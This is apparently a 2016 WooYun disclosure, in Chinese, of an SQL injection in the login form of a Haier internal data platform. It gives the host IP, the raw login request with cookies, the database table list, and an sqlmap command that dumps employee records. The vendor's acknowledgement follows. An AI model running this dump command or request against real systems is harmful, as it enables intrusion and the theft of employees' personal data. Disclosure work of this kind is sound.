当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209304

漏洞标题:海尔集团某系统SQL注入(泄露十万员工信息/姓名/工号/手机/部门/内部邮箱)

相关厂商:海尔集团

漏洞作者: 肉包包

提交时间:2016-05-16 19:22

修复时间:2016-07-01 09:40

公开时间:2016-07-01 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-16: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经确认,细节仅向厂商公开
2016-05-27: 细节向核心白帽子及相关领域专家公开
2016-06-06: 细节向普通白帽子公开
2016-06-16: 细节向实习白帽子公开
2016-07-01: 细节向公众公开

简要描述:

海尔集团某系统SQL注入(泄露十万员工信息/姓名/工号/手机/部门/内部邮箱)

详细说明:

海尔信息平台(信息到人数据可视化系统)
http://27.223.99.106:3000/login/log?next=%2F

he1.png


uname存在SQL注入

POST /login/log?next=%2F HTTP/1.1
Host: 27.223.99.106:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://27.223.99.106:3000/login/log?next=%2F
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229fba818f4569021e9902e3817561aee7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A46.0%29+Gecko%2F20100101+Firefox%2F46.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463375397%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dad271c28f09793bbbe4559883da794a536f88de6; PHPSESSID=sqn7nb2oupcg98ecu46q2vvad0
Connection: keep-alive
uname=admin&password=123456&commit=%E7%99%BB%E5%BD%95


4个库

he2.png



+--------------------------------+
| ODSXWPT_V_HRIT_XWPT_INFO       |
| Sheet1                         |
| USER_INFO                      |
| VDATA_CST_HR_EMP_BASE          |
| a1                             |
| a2                             |
| a3                             |
| a4                             |
| db1                            |
| db2                            |
| t_idm_user                     |
| temp_userxw                    |
| vdata_alarm                    |
| vdata_alarm_log                |
| vdata_alarm_max_time           |
| vdata_alarm_msg                |
| vdata_alarm_options            |
| vdata_alarm_org                |
| vdata_alarm_role               |
| vdata_alarm_temp               |
| vdata_alarm_template           |
| vdata_alarm_value              |
| vdata_brand                    |
| vdata_channel                  |
| vdata_child_industry           |
| vdata_collection               |
| vdata_dashboard_action         |
| vdata_dashboard_group          |
| vdata_dashboardgroup_post      |
| vdata_dashborad                |
| vdata_dashborad_0514           |
| vdata_dashbord_0515            |
| vdata_datachart_new            |
| vdata_datachart_new_0514       |
| vdata_datasource               |
| vdata_datasource_auth          |
| vdata_datasource_bak_0330      |
| vdata_datasource_config        |
| vdata_datasource_folder        |
| vdata_datasource_user          |
| vdata_dimensions               |
| vdata_dimensions_column        |
| vdata_grid_info                |
| vdata_grid_org                 |
| vdata_index                    |
| vdata_index_count              |
| vdata_industry                 |
| vdata_kpi_displaydef           |
| vdata_log                      |
| vdata_micro_member             |
| vdata_mirror_dashboard_group   |
| vdata_mirror_dashboard_org     |
| vdata_mirror_dashboard_role    |
| vdata_mirror_dashborad_chart   |
| vdata_monitors                 |
| vdata_new_log_all              |
| vdata_new_log_all_m            |
| vdata_new_log_all_month        |
| vdata_new_log_all_month_m      |
| vdata_new_log_class            |
| vdata_new_log_day              |
| vdata_new_log_dg_view          |
| vdata_new_log_master_day       |
| vdata_new_log_master_month     |
| vdata_new_log_month            |
| vdata_new_log_org_day          |
| vdata_new_log_org_month        |
| vdata_new_log_time_day         |
| vdata_new_log_time_month       |
| vdata_new_log_totle            |
| vdata_new_log_wgxw             |
| vdata_new_org_day_rate         |
| vdata_new_org_month_rate       |
| vdata_org                      |
| vdata_org_class                |
| vdata_org_class_disConfig      |
| vdata_org_class_disConfig_back |
| vdata_org_copy                 |
| vdata_org_dg                   |
| vdata_org_dic                  |
| vdata_org_index                |
| vdata_org_moblie_menu          |
| vdata_org_relation             |
| vdata_org_user                 |
| vdata_personal_folder          |
| vdata_platform                 |
| vdata_post                     |
| vdata_recent_view              |
| vdata_role                     |
| vdata_role_org                 |
| vdata_role_org_folder          |
| vdata_role_topic               |
| vdata_search_history           |
| vdata_small_v_platform         |
| vdata_sys_enum                 |
| vdata_sys_folder               |
| vdata_time_dic_bak2            |
| vdata_time_haier_dic           |
| vdata_tools_role_org           |
| vdata_user                     |
| vdata_user_brand               |
| vdata_user_channel             |
| vdata_user_industry            |
| vdata_user_org                 |
| vdata_user_post                |
| vdata_user_role                |
| vdata_v_alarm                  |
| vdata_v_dashboard_group        |
| vdata_v_dashboard_group_mirror |
| vdata_v_dashboard_personal     |
| vdata_v_index                  |
| vdata_v_org_wg                 |
| vdata_v_platform               |
| vdata_v_role_org_folder        |
| vdata_v_user                   |
| vdata_v_user_dept_info         |
| vdata_v_user_org               |
| vdata_v_xw_index               |
+--------------------------------+


十万记录

he3.png


he4.png


提取了三十个样本。(漏洞提交完已删除)

he5.png


漏洞证明:

he7.png


sqlmap.py -r 1.txt -D "vdata" -T "vdata_user" --dump  --start 10030 --stop 10060


he6.png


(漏洞提交完已删除所有数据)

修复方案:

修复

版权声明:转载请注明来源 肉包包@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-05-17 09:39

厂商回复:

感谢白帽子的测试与提醒,已安排人员进行处理

最新状态:

暂无